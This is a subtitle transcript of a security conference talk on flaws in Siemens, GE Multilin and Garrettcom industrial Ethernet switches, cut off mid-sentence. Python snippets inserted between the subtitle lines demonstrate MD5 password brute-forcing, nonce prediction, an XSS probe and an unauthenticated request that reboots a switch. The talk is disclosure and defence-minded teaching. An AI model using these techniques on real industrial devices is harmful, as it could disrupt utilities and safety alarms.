1
00:00:09,900 --> 00:00:20,581
Éireann: Things are blowing up, in
industrial systems, here in Germany, this
2
00:00:20,581 --> 00:00:26,080
year! I had hoped that these things
wouldn't happen, that this kind of future
3
00:00:26,080 --> 00:00:34,210
wouldn't be one that we are living in. But
unfortunately it is. And I hope that we
4
00:00:34,210 --> 00:00:39,550
can make that better, partly through the
course of this talk. But more, I think, in
5
00:00:39,550 --> 00:00:45,230
the future with your help and your work.
So I'm sorry to begin this presentation
6
00:00:45,230 --> 00:00:52,489
with such a dark thought but: This year's
theme is a new dawn. And it's always
7
00:00:52,489 --> 00:00:57,360
darkest just before the dawn. So we're
going to go through some of that darkness
8
00:00:57,360 --> 00:01:03,640
in industrial systems and SCADA-systems to
get to a better place, right? Now with
9
00:01:03,640 --> 00:01:09,550
that said no hacker really gets to be
where they are without the help of others,
10
00:01:09,550 --> 00:01:14,650
right? We stand on the shoulders of giants
and part of the key is not stepping on
11
00:01:14,650 --> 00:01:20,350
their toes, on the way up. So I would like
to say thank you to a bunch of people who
12
00:01:20,350 --> 00:01:24,720
are here and also some people who aren't
here. Particularly the Oslo hackerspace
13
00:01:24,720 --> 00:01:27,970
where I hang out. And these people have
taught me a lot of things not just about
14
00:01:27,970 --> 00:01:33,560
technology but about life. And "aún aprendo",
which is how Goya signed some
15
00:01:33,560 --> 00:01:40,090
of his last paintings and sketches - which
basically means "I'm still learning". OK.
16
00:01:40,090 --> 00:01:46,390
So with that said I hope that you will
enjoy this talk with its darkness and its
17
00:01:46,390 --> 00:01:49,890
humor all at the same time. I used to be
in circus, as you may have guessed from
18
00:01:49,890 --> 00:01:56,200
the mustache. So I encourage you not just
to view this as a technical vulnerability
19
00:01:56,200 --> 00:02:02,180
presentation but also as kind of live
technical standup comedy. Instead of jokes
20
00:02:02,180 --> 00:02:07,450
we have vulnerabilities. And I hope that
you will enjoy them. So these
21
00:02:07,450 --> 00:02:12,700
vulnerabilities are in switches. I chose
to focus on switches and that will become
22
00:02:12,700 --> 00:02:19,489
clear throughout the presentation, why I
chose to do that for industrial systems.
23
00:02:19,489 --> 00:02:23,580
And we are looking primarily at three
different families of switches. Because I
24
00:02:23,580 --> 00:02:28,049
don't want to pick on any one vendor. In
fact, the whole idea of this talk is to
25
00:02:28,049 --> 00:02:31,790
continue giving it. I have two other
colleagues who couldn't be here with me
26
00:02:31,790 --> 00:02:35,519
today, who have some vulnerabilities in
some other switches. And they look forward
27
00:02:35,519 --> 00:02:39,549
to presenting those vulnerabilities as
part of this presentation in the future.
28
00:02:39,549 --> 00:02:43,409
So every time we give this presentation
we'd like to give some new vulnerabilities
29
00:02:43,409 --> 00:02:49,680
and show that this is systemic and endemic
risk. So the three switches we'll be
30
00:02:49,680 --> 00:02:54,239
looking at today are the Siemens Scalance-
family, the GE Multilin-family and the
31
00:02:54,239 --> 00:02:58,819
Garrettcom Magnum family. These switches
are usually not very big. They might be 8
32
00:02:58,819 --> 00:03:05,709
ports, they might be 24 ports. And they're
used in a variety of different locations.
33
00:03:05,709 --> 00:03:13,260
So this talk is for you, if you work in a
utility, if you test industrial Ethernet
34
00:03:13,260 --> 00:03:17,480
switches, if you manage industrial
Ethernet networking, if you're comfortable
35
00:03:17,480 --> 00:03:21,510
at a Linux commandline and you play with
web apps but you don't know as much about
36
00:03:21,510 --> 00:03:25,450
reverse engineering. Don't worry, I'm
exactly the same. I suck at reverse
37
00:03:25,450 --> 00:03:31,519
engineering. But I care about this stuff.
And so I'm learning. If you are a
38
00:03:31,519 --> 00:03:35,909
developer of firmware then I think this
talk is for you as well. I hope you learn
39
00:03:35,909 --> 00:03:39,709
something from it. If you like
vulnerabilities you'll enjoy this quite a
40
00:03:39,709 --> 00:03:45,129
lot. I'm going to be sharing with you a
little collection I have, you know. Some
41
00:03:45,129 --> 00:03:51,629
people collect stamps or stories or jokes.
I collect private keys. And I like to
42
00:03:51,629 --> 00:03:58,011
share them with other enthusiasts such as
yourself. If you happen to work for one of
43
00:03:58,011 --> 00:04:01,090
the switch manufacturers you know I've
spoken to before. Some of you I get on
44
00:04:01,090 --> 00:04:06,809
with very well. We speak regularly. Some
of you not yet - but I hope you'll come
45
00:04:06,809 --> 00:04:13,199
and have a chat with me later. Ok, most
SCADA or ICS presentations go a bit like
46
00:04:13,199 --> 00:04:20,640
this: Pwn the PLC, the RTU, the HMI - these
are terms, you know, that all of us in
47
00:04:20,640 --> 00:04:23,830
SCADA know. Maybe most of you know them by
now, they're pretty popular. I hope you
48
00:04:23,830 --> 00:04:27,780
do. But programmable logic controller,
remote terminal unit or human machine
49
00:04:27,780 --> 00:04:32,920
interface. And the basic idea of the
presentation is if I pwn these things,
50
00:04:32,920 --> 00:04:38,090
game over. Physical damage. I win. Isn't
the world a scary place? And I encourage
51
00:04:38,090 --> 00:04:42,240
you to demand better content. I certainly
grew up with better content. I used to go
52
00:04:42,240 --> 00:04:46,229
and see the presentations and the talks of
a guy called Jason Larson. And he has a
53
00:04:46,229 --> 00:04:50,271
fantastic example of this. I want all of
you to try it, right now. Just think
54
00:04:50,271 --> 00:04:56,110
about: If you had complete control over a
paint factory. What would you do to damage
55
00:04:56,110 --> 00:04:59,470
it? No one is going to get hurt.
Everything's safe. It's a thought
56
00:04:59,470 --> 00:05:05,630
experiment, right? What would you do to
damage it? Most people can't answer this
57
00:05:05,630 --> 00:05:09,740
question. And on certain types of
processes I can't answer this question.
58
00:05:09,740 --> 00:05:12,790
But other types I've worked with before
and I can answer this question. And I
59
00:05:12,790 --> 00:05:17,530
encourage you to to ask it. But if you
like and you want to learn more go and see
60
00:05:17,530 --> 00:05:24,069
Marmusha's talk - I think it's tomorrow.
Think of my talk as a frame for her talk.
61
00:05:24,069 --> 00:05:28,111
She's going to be talking about how to
damage a chemical process. And what you
62
00:05:28,111 --> 00:05:32,090
need to do as an engineer to do that. And
the reason she's doing that is to build a
63
00:05:32,090 --> 00:05:36,290
better process in the future. You have to
break a few things to make them work a
64
00:05:36,290 --> 00:05:41,379
little bit better. Okay. So what's the
point in industrial control systems
65
00:05:41,379 --> 00:05:47,750
security? It's not credit card data. It's
not privacy. No disrespect to my privacy
66
00:05:47,750 --> 00:05:52,240
friends in the room. I have the deepest
love and respect for the work that you do.
67
00:05:52,240 --> 00:05:58,310
But confidentially ... confidentiality is
the lowest priority for us in industrial
68
00:05:58,310 --> 00:06:04,830
systems. It would go: Availability,
integrity, confidentiality. And you might
69
00:06:04,830 --> 00:06:10,970
even swap integrity and availability in
many cases. So, you have to protect the
70
00:06:10,970 --> 00:06:16,770
sensor data or the control signals.
Everything else is maybe a vulnerability
71
00:06:16,770 --> 00:06:20,210
on the path to getting this. But it's not
the most important thing that we're trying
72
00:06:20,210 --> 00:06:25,600
to protect. So that's why I'm attacking
switches. That's where the process is,
73
00:06:25,600 --> 00:06:32,639
right? Now these may not be core switches.
They're often a little bit further down in
74
00:06:32,639 --> 00:06:37,069
the chain. They're field devices, right.
So you might find them in any of these
75
00:06:37,069 --> 00:06:44,590
locations. And this last example is not
necessarily important because oil and gas
76
00:06:44,590 --> 00:06:49,270
is important - but it's important because
it gives you the general format of all
77
00:06:49,270 --> 00:06:53,300
industrial systems. You have a sensor
network. And sensor data is traveling back
78
00:06:53,300 --> 00:06:58,610
and forth. And you have control signal
data. That's it, basically. You might have
79
00:06:58,610 --> 00:07:01,349
different control signals on different
protocols and you might have different
80
00:07:01,349 --> 00:07:05,410
sensors on different protocols, giving you
different values like pressure or heat or
81
00:07:05,410 --> 00:07:15,889
whatever. But most processes follow
basically this format. Okay. I don't do
82
00:07:15,889 --> 00:07:19,509
SCADA 101. There are other people who do
this. I'm trying to do a little bit, to
83
00:07:19,509 --> 00:07:25,759
set the reference for this talk, but
usually I avoid it. So basically there's
84
00:07:25,759 --> 00:07:30,819
not much authentication or integrity in
industrial systems protocols. There's not
85
00:07:30,819 --> 00:07:36,370
much cryptography. You would expect there
to be, maybe. I'm continually surprised
86
00:07:36,370 --> 00:07:40,319
that I don't find any. And when I do find
it, it's badly implemented and barely
87
00:07:40,319 --> 00:07:48,229
works. So once you have compromised a
switch or another part of the network you
88
00:07:48,229 --> 00:07:51,930
can perform man-in-the-middle attacks on
the process. Or you can create malicious
89
00:07:51,930 --> 00:07:56,400
firmwares on these different switches. And
that's what I'm trying to prevent. I'm
90
00:07:56,400 --> 00:08:00,029
trying to find some of the different
methods that people can use to produce
91
00:08:00,029 --> 00:08:09,800
these firmwares - and then get the vendors
to fix them, right. Okay. These are some
92
00:08:09,800 --> 00:08:14,419
of the protocols. If you are new to this
space, if you want to do some more work in
93
00:08:14,419 --> 00:08:17,550
this area, but you don't know what to work
on, take a picture of the slide or go and
94
00:08:17,550 --> 00:08:21,319
find it later. And choose one of these
protocols and go and work on it. We need
95
00:08:21,319 --> 00:08:24,250
people to go to these different
organizations. Some of them are
96
00:08:24,250 --> 00:08:27,499
proprietary, some of them are open and
complain that there is not enough
97
00:08:27,499 --> 00:08:32,250
cryptography going on in this space. And
yes you can use VPNs. But believe me, I
98
00:08:32,250 --> 00:08:43,720
often don't find them. Okay. These are the
switches, the specific versions of the
99
00:08:43,720 --> 00:08:46,600
firmware, in case you're here for
vulnerabilities instead of just me
100
00:08:46,600 --> 00:08:52,020
waffling on about the basics. If you want
to go and look these up, if you're a
101
00:08:52,020 --> 00:08:57,910
penetration tester working in this space,
you can go and find them all online. And
102
00:08:57,910 --> 00:09:02,210
you can get a feeling for the kind of
coding practices that go into these
103
00:09:02,210 --> 00:09:07,440
different devices. Now I've tried to
choose the vulnerabilities that I'm
104
00:09:07,440 --> 00:09:14,710
presenting very carefully. To take you
gently from web app vulnerabilities into a
105
00:09:14,710 --> 00:09:19,950
little bit deeper into the firmware. So
the first one we'll be looking at is
106
00:09:19,950 --> 00:09:24,710
Siemens. And again, I'm not picking on any
particular vendor. In fact I'm very proud
107
00:09:24,710 --> 00:09:30,310
of Siemens. They're probably here again.
They've been here many years. And they fixed
108
00:09:30,310 --> 00:09:35,200
these vulnerabilities within three months.
And I think that was awesome - especially
109
00:09:35,200 --> 00:09:41,500
in the space that I work in. The average
patch-time in SCADA and ICS is 18 months.
110
00:09:41,500 --> 00:09:45,500
So I think Siemens deserves a round of
applause for getting these fixed.
111
00:09:45,500 --> 00:09:52,870
Applause
So without further ado let's have some
112
00:09:52,870 --> 00:09:58,590
fun, right. So MD5, you go to the web page
for this switch. This is the management
113
00:09:58,590 --> 00:10:03,350
page of a switch, right. And you interact
with this webpage. And you have a look at
114
00:10:03,350 --> 00:10:12,580
it. And on the client side they do MD5 of
the password. Okay. That's fascinating. I
115
00:10:12,580 --> 00:10:17,290
don't think that's particularly secure.
But it's done in roughly the same format
116
00:10:17,290 --> 00:10:20,641
as that Linux command. So I use the Linux
command instead of the JavaScript just to
117
00:10:20,641 --> 00:10:26,060
make it easier for everyone. You have the
username at the beginning and the password
118
00:10:26,060 --> 00:10:30,040
is in the middle. And then you have this
nonce that's at the end, a number you use
119
00:10:30,040 --> 00:10:34,470
once, right. I was surprised to see the
nonce, and it's even called a nonce,
120
00:10:34,470 --> 00:10:37,140
right. So somebody had done a little bit
of homework on their cryptography. And
121
00:10:37,140 --> 00:10:41,150
they understood that they wanted to use,
you know, this number used once to prevent
122
00:10:41,150 --> 00:10:45,340
replay of the hash every time. Okay,
that's some pretty good work.
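A minimal sketch of what that client-side step amounts to, and of how quickly candidate passwords can be tested against a captured digest. The concatenation order, the missing delimiter and the function names here are illustrative assumptions, not the switch's actual JavaScript:

import hashlib
import itertools
import string

def client_digest(username, password, nonce):
    # Roughly equivalent to: echo -n "adminSECRET1a2b3c4d" | md5sum
    return hashlib.md5((username + password + nonce).encode()).hexdigest()

def crack(username, nonce, captured, alphabet=string.ascii_lowercase, max_len=5):
    # Walk every candidate up to max_len characters; short passwords fall in
    # seconds, which is the core problem with a fast, unsalted hash like MD5.
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            if client_digest(username, candidate, nonce) == captured:
                return candidate
    return None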
123
00:10:45,340 --> 00:10:49,200
Unfortunately this is MD5 and this is
protecting your electric utilities and
124
00:10:49,200 --> 00:10:56,070
your water and your sewage systems. And
you can brute force this in a few seconds,
125
00:10:56,070 --> 00:11:00,200
if the passwords are less than eight
characters. And if they're around 15 it
126
00:11:00,200 --> 00:11:04,460
might take you 20 minutes or something.
You can do this from PCAPs, from network
127
00:11:04,460 --> 00:11:08,300
traffic captures. And then you have the
cleartext password that you can use
128
00:11:08,300 --> 00:11:16,420
forever after, with that switch. So, off
to a bad start, in my opinion. So these
129
00:11:16,420 --> 00:11:22,770
are the nonces that we're looking at. I'm
glad to hear you laughing. It makes me, it
130
00:11:22,770 --> 00:11:27,421
warms the heart, right. So you can see
that they are incrementing and that they
131
00:11:27,421 --> 00:11:37,750
are hex. Yeah. What else can you say about
this? The last half is different than the
132
00:11:37,750 --> 00:11:45,870
first half. Not only is it incrementing,
it is sequential. If you pull them quickly
133
00:11:45,870 --> 00:11:53,260
enough. For those of you who also do a bit
of reverse engineering you might recognize
134
00:11:53,260 --> 00:11:58,130
the first half as well. Anybody in the
room see any patterns in the first half of
135
00:11:58,130 --> 00:12:09,950
the nonces? No? Hmm? Very good: IP
address. MAC address would have been a
136
00:12:09,950 --> 00:12:13,521
good guess as well. I thought it was at
first. And I got very confused when I went
137
00:12:13,521 --> 00:12:17,340
to look for the IP address. Because I went
to the switch itself. And the switch's IP
138
00:12:17,340 --> 00:12:25,080
address was not this in hex. It's the
client-side address. Which I just couldn't
139
00:12:25,080 --> 00:12:29,380
believe, right? Like, it seems like it
makes a sort of sense if you're trying to
140
00:12:29,380 --> 00:12:33,580
keep session IDs in state. And it's like
oh I want a different session for every IP
141
00:12:33,580 --> 00:12:39,480
address. And then I'll just use time, I
use uptime in hex as the rest of my
142
00:12:39,480 --> 00:12:45,160
session ID, right? You know, the entire IP
space and time, that can't be brute forced.
143
00:12:45,160 --> 00:12:52,250
It has a kind of crazy logic to it, right.
Unfortunately it can be. And you can get
144
00:12:52,250 --> 00:12:56,730
the uptime from the device using SNMP. And
of course if you don't want to use SNMP
145
00:12:56,730 --> 00:13:04,470
you can get old-school and use the TCP
sequence numbers. So, not a lot of
146
00:13:04,470 --> 00:13:09,550
entropy there, I guess, I would say. And I
think their lawyers agreed when they put
147
00:13:09,550 --> 00:13:17,640
out the comments on this. All right. Not
only can you perform session hijacking.
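Putting the pieces just described together, a hedged sketch of reconstructing such a nonce. The exact field widths and layout are assumptions; the uptime half can be read remotely via the standard SNMP sysUpTime object or estimated from TCP sequence numbers, as mentioned above:

import ipaddress

def predict_nonce(client_ip, uptime_ticks):
    # First half: the client's IPv4 address as eight hex digits.
    ip_part = format(int(ipaddress.ip_address(client_ip)), "08x")
    # Second half: device uptime in hex, e.g. from SNMP sysUpTime
    # (1.3.6.1.2.1.1.3.0); width and tick unit are assumptions here.
    time_part = format(uptime_ticks, "08x")
    return ip_part + time_part

# e.g. predict_nonce("192.168.1.50", 0x0001e240) -> "c0a801320001e240"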
148
00:13:17,640 --> 00:13:21,050
And if you are attacking switches I'd like
to point out that session hijacking is not
149
00:13:21,050 --> 00:13:25,230
necessarily a great attack in this
environment. Think about it like you would
150
00:13:25,230 --> 00:13:29,700
at home, right. How often do you log into
your router? In fact even more importantly
151
00:13:29,700 --> 00:13:33,250
how often do you upgrade the firmware on
your router? Everyone who has upgraded the
152
00:13:33,250 --> 00:13:37,940
firmware on their router ever raise your
hand. Just for an experiment. Thank
153
00:13:37,940 --> 00:13:42,140
goodness, right. But wait, keep them up
just for a minute. Everybody who's updated
154
00:13:42,140 --> 00:13:45,670
it this year, keep your hand up. Everybody
else put them down. Everybody who has
155
00:13:45,670 --> 00:13:50,420
updated in the last six months ... okay
... So that gives you a sense of how long
156
00:13:50,420 --> 00:13:55,061
these vulnerabilities can be in play in an
industrial systems environment. If you
157
00:13:55,061 --> 00:14:01,800
multiply that by about 10, right. Okay, so
you can simply upload a firmware image to
158
00:14:01,800 --> 00:14:06,140
a Siemens Scalance device with this
version number without authentication. You
159
00:14:06,140 --> 00:14:15,700
just need to know the URL. Cross-site
request forgery, right. I just say CSRF
160
00:14:15,700 --> 00:14:20,220
all the time. I don't even remember what
it stands for. So you can upload or you
161
00:14:20,220 --> 00:14:23,381
can download a logfile. Not that useful
but you get a sense of what's going on on
162
00:14:23,381 --> 00:14:27,191
the switch. You know what usernames might
be present, whatever. Incidentally all of
163
00:14:27,191 --> 00:14:32,050
these switches by default or at least this
one only have two usernames, right. So
164
00:14:32,050 --> 00:14:37,151
it's "admin" and "operator" I think on
this switch. Or maybe it's not. But
165
00:14:37,151 --> 00:14:42,830
anyway, there's two usernames "admin" and
"manager"? I know I get them mixed up now.
166
00:14:42,830 --> 00:14:47,130
But the configuration includes password
hashes. I'm actually not even entirely
167
00:14:47,130 --> 00:14:50,620
convinced they're hashes because when you
increase the length of your password it
168
00:14:50,620 --> 00:14:55,610
increases. But I'll leave that for future
researchers to examine. You can download
169
00:14:55,610 --> 00:14:59,241
the firmware image from the device, which
is nice. So you just make a request. You
170
00:14:59,241 --> 00:15:03,110
just post an HTTP-request to this device.
And it gives you the firmware that it is
171
00:15:03,110 --> 00:15:07,820
running back. That's not that big a deal,
right. Because you're just viewing data on
172
00:15:07,820 --> 00:15:14,930
the switch. But you can upload firmware
and configuration to this device. Which is
173
00:15:14,930 --> 00:15:18,540
an authentication bypass in and of itself.
But it's also interesting because I can
174
00:15:18,540 --> 00:15:22,430
take a configuration file from one of the
devices that I have at home with a known
175
00:15:22,430 --> 00:15:27,490
password. I can upload a new configuration
file with a password that I know. I can
176
00:15:27,490 --> 00:15:31,500
use the device to do whatever I want to
do. And later I can re-upload the old
177
00:15:31,500 --> 00:15:35,560
configuration file that I got from the
device, so no one ever even realizes what's
178
00:15:35,560 --> 00:15:45,730
been changed, right. So. I think that's a
disappointing state of affairs. And I
179
00:15:45,730 --> 00:15:49,340
wrote a script to do this. So that you
wouldn't have to when you are doing
180
00:15:49,340 --> 00:15:53,920
penetration tests of these devices. And I
gave you a little ASCII menu because
181
00:15:53,920 --> 00:15:58,410
sometimes I get bored. Cambridge is a
small town and there's not much to do in
182
00:15:58,410 --> 00:16:05,640
the evening. So feel free to go and
examine my github-repository where I put
183
00:16:05,640 --> 00:16:11,910
up some of this stuff. I'm Blackswanburst
on Github, and on Twitter. So like I say,
184
00:16:11,910 --> 00:16:15,360
Siemens are some of my favorite people. So
I'm going to finish up with them. This is
185
00:16:15,360 --> 00:16:19,980
old-day, if you like, all that you have
just seen. But I want you to keep in mind
186
00:16:19,980 --> 00:16:24,230
that these vulnerabilities will still be
present in the wild for another two or
187
00:16:24,230 --> 00:16:28,980
three years. And I encourage you to go and
have a look at your systems, if you have
188
00:16:28,980 --> 00:16:34,170
any of these devices. And check them out.
And upgrade the firmware. I also hope this
189
00:16:34,170 --> 00:16:38,540
encourages you that if you haven't done
much in industrial systems and SCADA you
190
00:16:38,540 --> 00:16:42,270
don't have to be intimidated by all of the
engineering and the terminology, and the
191
00:16:42,270 --> 00:16:47,001
verbiage. There is plenty for any
of you in this room to do in the
192
00:16:47,001 --> 00:16:51,700
industrial systems space. You need to
spend a little time speaking to engineers
193
00:16:51,700 --> 00:16:56,900
and translating your vulnerabilities into
something meaningful for them. But that's
194
00:16:56,900 --> 00:17:00,250
just a matter of spending more time with
them and getting to know them. And I think
195
00:17:00,250 --> 00:17:03,740
that's valuable too because they have a
lot of experience. They care very deeply
196
00:17:03,740 --> 00:17:08,309
about safety. And I've learned quite a lot
of things from engineers. My general point
197
00:17:08,309 --> 00:17:13,601
here is I'd like you to stop defending
banks and websites and other stuff. We
198
00:17:13,601 --> 00:17:18,099
need your help in industrial systems, in
the utilities. We could really do with
199
00:17:18,099 --> 00:17:22,180
living in a safer world rather than one
where you're just protecting other
200
00:17:22,180 --> 00:17:32,480
people's money. So we're gonna move on to
the GE Multilin line. I worked on a GE
201
00:17:32,480 --> 00:17:38,830
ML800 but these vulnerabilities affect
seven of the nine switches in this family.
202
00:17:38,830 --> 00:17:43,410
Seven because one of the other switches is
an unmanaged switch. If you're a hardware
203
00:17:43,410 --> 00:17:47,880
person maybe you want to go and play
around with those but not so much my thing
204
00:17:47,880 --> 00:17:51,130
and the other one uses a different
firmware image but seven of the nine
205
00:17:51,130 --> 00:17:58,020
switches use a similar firmware image. GE
offers a worldwide 10-year warranty. So
206
00:17:58,020 --> 00:18:01,950
let's see if that includes fixing
vulnerabilities. I think it should. What
207
00:18:01,950 --> 00:18:10,650
do you think? No? A couple of noes, a couple of
yeses, undecided. All right. CCC is
208
00:18:10,650 --> 00:18:17,851
undecided on something that's novel. Let's
start with some new vulnerabilities. Cross
209
00:18:17,851 --> 00:18:22,750
site scripting. Reflected, I grant you, but
still cross-site scripting. And I want you
210
00:18:22,750 --> 00:18:25,530
to pay attention to the details. I'm not
going to go slow for you and ask you to
211
00:18:25,530 --> 00:18:29,160
think. I know it's morning, I know it's
tough but I am going to ask you to think.
212
00:18:29,160 --> 00:18:36,970
See flash up there flash.php and the third
one. Yes, it runs flash in your browser.
213
00:18:36,970 --> 00:18:42,470
So if you know something about Flash come
and have a look at the switch some time. I
214
00:18:42,470 --> 00:18:47,751
didn't go for active script attacks. There is
so much attack surface on this device. I
215
00:18:47,751 --> 00:18:52,460
just sometimes don't even know how I'm
going to finish looking at all of them. So
216
00:18:52,460 --> 00:18:55,780
I just work with the web interface to
begin with. So you have this cross site
217
00:18:55,780 --> 00:19:00,680
scripting times eight and I want you to
notice, in the last section there,
218
00:19:00,680 --> 00:19:05,970
arbitrarily supplied URL parameters. I
don't know about you but I think that's
219
00:19:05,970 --> 00:19:10,180
funny right. You can just make up
parameters to stick your cross site
220
00:19:10,180 --> 00:19:20,480
scripting in. laughs It's unbelievable
right. Yeah. Anyways what does that look
221
00:19:20,480 --> 00:19:28,340
like. It looks like that, they have an
error data page. OK maybe I'm using a
222
00:19:28,340 --> 00:19:33,370
browser that they don't approve or
something but it deserves looking at. And
223
00:19:33,370 --> 00:19:39,470
you can do quite a lot of things with
javascript on the client side these days.
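For illustration, a hedged probe for that kind of reflection. The address, page name and parameter are hypothetical placeholders; the point is that even an invented parameter name comes back unescaped in the error page:

import requests

SWITCH = "https://192.0.2.10"   # placeholder management address
PAYLOAD = "<script>alert(document.cookie)</script>"

resp = requests.get(
    SWITCH + "/somepage.php",                 # hypothetical page name
    params={"made_up_parameter": PAYLOAD},    # the parameter need not exist
    verify=False,                             # these devices ship self-signed certs
    timeout=10,
)
print("reflected unescaped" if PAYLOAD in resp.text else "not reflected")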
224
00:19:39,470 --> 00:19:44,480
Disturbing. Anyways I'm not a big fan of
XSS so I'm going to move on to things that
225
00:19:44,480 --> 00:19:52,690
I think are worth my time. So if you fetch
the initial web page of this switch before
226
00:19:52,690 --> 00:20:01,380
you've even logged in you get this config.
So this is pre-authentication. No
227
00:20:01,380 --> 00:20:06,850
authentication, right. Now keep in mind that
these switches are designed for process
228
00:20:06,850 --> 00:20:14,610
data, right. It's not carrying traffic to
images of cats. It's supposed to be for
229
00:20:14,610 --> 00:20:22,630
engineering. So what happens if I add a
nocache parameter and I make it say 500000
230
00:20:22,630 --> 00:20:30,030
digits long. I should just be able to
crash the web server. Right. Maybe maybe.
231
00:20:30,030 --> 00:20:41,270
But you would not expect it to reboot the
switch. And it takes a minute or so for
232
00:20:41,270 --> 00:20:44,800
the switch to reboot, which is actually
really impressive; it comes up pretty quickly.
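A minimal sketch of that pre-authentication request, with the address and path as placeholders. Since the observed effect on the tested device was a full reboot, this belongs only on hardware you own:

import requests

SWITCH = "http://192.0.2.20"    # placeholder address; only test gear you own

try:
    requests.get(
        SWITCH + "/",                          # the pre-authentication page
        params={"nocache": "9" * 500000},      # ~500,000-digit parameter
        timeout=30,
    )
except requests.exceptions.RequestException as exc:
    # On the tested device the web server died and the whole switch rebooted.
    print("request failed:", exc)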
233
00:20:44,800 --> 00:20:50,950
But you know obviously you can repeat
this. So I wanted to examine that a lot
234
00:20:50,950 --> 00:20:56,390
further. I wanted to know more about that
crash, about what was rebooting the switch.
235
00:20:56,390 --> 00:20:59,290
But like I say I'm not a very good reverse
engineer. So you're going to go on a
236
00:20:59,290 --> 00:21:02,590
little journey with me where I learned a
couple of things about reverse engineering
237
00:21:02,590 --> 00:21:06,160
and I had to change my approach from
looking at the webapp style alone to
238
00:21:06,160 --> 00:21:12,470
moving into this other stuff. So why is
a DoS even interesting? You'll
239
00:21:12,470 --> 00:21:18,320
remember that I mentioned Marmusha's talk. So
the reason I mention her talk, this is it
240
00:21:18,320 --> 00:21:23,690
right. Denial of service on a website? Who
cares, it's tearing posters down, as xkcd
241
00:21:23,690 --> 00:21:28,950
once famously explained to us but in the
industrial systems environment it's very
242
00:21:28,950 --> 00:21:33,980
different. It can be very serious right. A
simplistic example is you have an
243
00:21:33,980 --> 00:21:38,750
application that has a heartbeat and if
you stop that heartbeat it might go into
244
00:21:38,750 --> 00:21:44,060
some sort of safety state it might for
example scram a reactor. There is a famous
245
00:21:44,060 --> 00:21:50,851
denial of service on PLCs that did scram a
reactor in real life. Does anybody know
246
00:21:50,851 --> 00:21:58,650
what H2S is? Any oil and gas engineers in
the room? Okay so H2S alerts not reaching
247
00:21:58,650 --> 00:22:02,861
their destinations is pretty serious
business right. For those of you who are
248
00:22:02,861 --> 00:22:07,850
not aware of H2S it's a byproduct of
producing oil and gas and inhaled in very
249
00:22:07,850 --> 00:22:12,850
very small amounts you can go unconscious
and in sort of larger amounts, respiratory
250
00:22:12,850 --> 00:22:18,480
failure. So if you take safety
seriously if you ever work on these rigs
251
00:22:18,480 --> 00:22:23,140
in these environments you learn to care
about the wind sock. Right one of these
252
00:22:23,140 --> 00:22:26,620
alerts goes out. An alarm goes off. There
are many different alarms you have to
253
00:22:26,620 --> 00:22:31,200
memorize how they all sound on a rig and
then react to them and when you hear the
254
00:22:31,200 --> 00:22:35,330
H2S alert you look up at the wind sock to
keep an eye on where the wind is and
255
00:22:35,330 --> 00:22:40,420
try to avoid being downwind of wherever
the leak is. So a simple denial of service
256
00:22:40,420 --> 00:22:43,510
that we would not care about in a web
application environment in this
257
00:22:43,510 --> 00:22:47,940
environment can be very serious. I'm not
saying it always is. It just can be
258
00:22:47,940 --> 00:22:53,350
right. So denial of service goes up in our
list of problems especially when we're
259
00:22:53,350 --> 00:22:58,270
looking at networking devices. Okay so
that's that's it for the denial of
260
00:22:58,270 --> 00:23:01,550
service. But like I say we're going to
look at some other stuff. In fact the
261
00:23:01,550 --> 00:23:07,320
story with this switch began with a
concerned citizen. About three or four
262
00:23:07,320 --> 00:23:12,280
years ago I found 10000 industrial systems
on the Internet as part of my master's
263
00:23:12,280 --> 00:23:17,990
thesis and I was pretty uncomfortable with
that. So I sent that data to various
264
00:23:17,990 --> 00:23:23,889
computer emergency response teams around
the world. I believe it was 52 of them
265
00:23:23,889 --> 00:23:26,860
right. Not all of them were critical
infrastructure. A lot of them were small
266
00:23:26,860 --> 00:23:31,370
stuff, but maybe 1 in 100, I was told, or in
one particular country, when they got back
267
00:23:31,370 --> 00:23:38,400
to me, 1 in 20, were considered critical
infrastructure. And after that you have a
268
00:23:38,400 --> 00:23:42,540
sort of reputation among the computer
emergency response teams of the world. So
269
00:23:42,540 --> 00:23:47,580
people send you stuff you get anonymous
e-mails from someone called Concerned
270
00:23:47,580 --> 00:23:53,330
Citizen. Thank you very much. They sent me
a firmware upgrade pcap of this particular
271
00:23:53,330 --> 00:23:57,350
device. I suspect that they worked at one
of the utilities and they wanted me to see
272
00:23:57,350 --> 00:24:05,559
how upgrading the firmware of this GE switch
was performed. So it all began with a pcap.
273
00:24:05,559 --> 00:24:11,290
So I ran tcptrace to carve out all the
files and see what was going on and you
274
00:24:11,290 --> 00:24:16,590
could see instantly that there was an FTP
session. Later, looking at the switch, I see
275
00:24:16,590 --> 00:24:21,120
that you can also upgrade them over TFTP.
So the management of the switch happens over
276
00:24:21,120 --> 00:24:26,841
HTTPS and is encrypted, but the firmware
upload goes across FTP, right. So you can
277
00:24:26,841 --> 00:24:33,700
just carve the file out, a little bit of
network forensics I guess. So instantly I
278
00:24:33,700 --> 00:24:36,950
could see that this one is complete and
the ports on the end of the numbers give
279
00:24:36,950 --> 00:24:40,660
me a clue of what's going on in the larger
stream. This one seems interesting. Let's
280
00:24:40,660 --> 00:24:48,240
have a look at it. So. I tried running
file and binwalk. I don't know about you,
281
00:24:48,240 --> 00:24:52,860
but I believe that hacking is a journey of
understanding. In fact, hacking is
282
00:24:52,860 --> 00:24:57,740
understanding a system better than it
understands itself and nudging it to do
283
00:24:57,740 --> 00:25:03,950
what you want right. And I also feel that
I should understand my tools. I don't
284
00:25:03,950 --> 00:25:07,420
really understand my tools until I know
where they're going to fail me or they
285
00:25:07,420 --> 00:25:11,040
have failed me in the past and in this
particular case I think binwalk is a
286
00:25:11,040 --> 00:25:15,150
fantastic tool and file is a fantastic
tool. But they didn't tell me anything and
287
00:25:15,150 --> 00:25:18,750
that was a journey of discovery
for me. So that was nice. It was like OK
288
00:25:18,750 --> 00:25:21,700
binwalk doesn't always give me everything.
I think I was running an older version and
289
00:25:21,700 --> 00:25:25,179
I think it would handle it now. But the
point is, after binwalk didn't give me
290
00:25:25,179 --> 00:25:29,950
anything, I just resorted to the old-school
stuff, right. Run strings, and I found these
291
00:25:29,950 --> 00:25:34,050
deflate and inflate copyright strings and
I could tell that a certain portion of the
292
00:25:34,050 --> 00:25:43,670
file was compressed. This is just from the
pcap. Remember this whole story. So I
293
00:25:43,670 --> 00:25:49,040
tried to deflate the whole thing. That
didn't work. Again, I just did something
294
00:25:49,040 --> 00:25:54,561
simple: a python script that checks
